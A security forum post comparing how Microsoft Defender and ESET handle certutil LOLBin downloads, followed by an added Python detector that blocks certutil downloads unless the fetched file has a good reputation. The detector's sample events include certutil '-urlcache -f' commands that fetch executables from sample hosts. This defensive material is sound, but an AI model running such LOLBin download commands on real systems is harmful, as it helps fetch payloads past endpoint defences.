Of LoLBins, 0-Days, ESET, and Microsoft Defender
<blockquote data-quote="Andy Ful" data-source="post: 1083215" data-attributes="member: 32260"><p>The detection of Microsoft Defender is acceptable, because the Certutil LOLBin has been used in attacks many times and people rarely use it to download files. However, the detection could be improved by allowing files with good reputations. In the case of the test, the file should be allowed (it has a good reputation), but a file with an unknown reputation might be blocked.</p><p></p><p>The detection of Eset in the test is also acceptable because the downloaded file has a good reputation.</p><p>I think that [USER=7463]@cruelsister[/USER]'s test can be extended as follows:</p><ol> <li data-xf-list-type="ol">Download the file that SmartScreen blocks in Edge (SmartScreen set to "Block potentially unwanted apps") by choosing "keep the file".</li> <li data-xf-list-type="ol">Check whether the file from point 1 is undetected by Eset.</li> <li data-xf-list-type="ol">If points 1 and 2 are fulfilled, download the file again using the Certutil LOLBin.</li> </ol><p>The extended test is based on the rational idea that potentially unwanted apps downloaded via suspicious methods should be prevented. It is possible that Eset will fail such a test.</p><p>[USER=7463]@cruelsister[/USER]'s test shows that Microsoft Defender's detection can be improved. The extended test (if Eset fails it) can show that Eset's detection can be improved.</p></blockquote>
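The policy the post argues for, a certutil download is suspicious on its own, so block it unless the resulting file has a good reputation and treat an unknown reputation like a bad one, can be written down as detection logic. The block below is an added example and is not code from the thread, from Andy Ful, or from any vendor product; the process-creation events, the hash values and the reputation table are constructed for the demonstration, and in a real pipeline the command line would come from a process-creation event (Sysmon event 1 or Windows 4688) and the hash from the file the command wrote. The parser accepts both `-` and `/` switch prefixes in any case, which certutil itself allows, and only treats the invocation as a download when a download switch (`-urlcache` or `-verifyctl`) and a URL are both present, so `certutil -hashfile` and similar benign uses are not flagged.

```python
"""Reputation-gated detection of certutil.exe LOLBin downloads.

Added example. The events, hashes and reputation table are constructed
for the demonstration and do not come from the original thread.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# certutil switches that make it fetch a URL. Attackers rely on
# "-urlcache -f"; "-verifyctl" also downloads the target, so it is
# treated the same way.
DOWNLOAD_SWITCHES = {"urlcache", "verifyctl"}
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed stand-in for a cloud reputation lookup, keyed by SHA-256.
# Anything absent from the table is "unknown".
REPUTATION: Dict[str, str] = {
    "11" * 32: "good",   # well-known, widely distributed file
    "22" * 32: "bad",    # known malware
}


@dataclass
class ProcEvent:
    """Minimal process-creation event: image path, command line, and the
    SHA-256 of the file the command wrote (None if not known yet)."""
    image: str
    command_line: str
    written_sha256: Optional[str] = None


def _tokens(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_certutil_download(cmdline: str) -> Optional[dict]:
    """Return {"url": ..., "switches": [...]} when cmdline is a certutil
    download, otherwise None. Switches may use '-' or '/' in any case."""
    toks = _tokens(cmdline)
    if not toks:
        return None
    exe = re.split(r"[\\/]", toks[0])[-1].lower()
    if exe not in ("certutil", "certutil.exe"):
        return None
    switches = {t[1:].lower() for t in toks[1:] if len(t) > 1 and t[0] in "-/"}
    if not switches & DOWNLOAD_SWITCHES:
        return None
    urls = [t for t in toks[1:] if URL_RE.match(t)]
    if not urls:
        return None
    return {"url": urls[0], "switches": sorted(switches)}


def decide(event: ProcEvent, reputation: Dict[str, str] = REPUTATION) -> Tuple[str, str]:
    """Apply the policy: block a certutil download unless the written file
    has a good reputation; unknown reputation is handled like bad."""
    dl = parse_certutil_download(event.command_line)
    if dl is None:
        return ("allow", "not a certutil download")
    rep = reputation.get((event.written_sha256 or "").lower(), "unknown")
    if rep == "good":
        return ("allow", f"certutil download of {dl['url']} but file reputation is good")
    return ("block", f"certutil download of {dl['url']} with {rep} file reputation")


# Constructed sample events (paths, hosts and hashes are made up).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r'certutil.exe -urlcache -split -f "https://example.com/setup.exe" C:\Users\u\setup.exe',
              "11" * 32),                      # good reputation -> allow
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil /URLCache /f http://198.51.100.7/x.exe x.exe",
              "ab" * 32),                      # unknown reputation -> block
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -f https://example.net/a.exe a.exe",
              "22" * 32),                      # bad reputation -> block
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -hashfile C:\Users\u\setup.exe SHA256",
              None),                           # not a download -> allow
]


def triage(events: List[ProcEvent] = SAMPLE_EVENTS) -> List[str]:
    """Verdict per event, in order."""
    return [decide(e)[0] for e in events]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        verdict, why = decide(e)
        print(f"{verdict:5s}  {why}")
```

The reputation lookup is the part that would differ in a real product; what the example pins down is the ordering of the checks: the LOLBin-plus-URL signal is established first, and reputation only ever downgrades a block to an allow, never the reverse, so a good-reputation file fetched by certutil (the case in the video) passes while an unknown one does not.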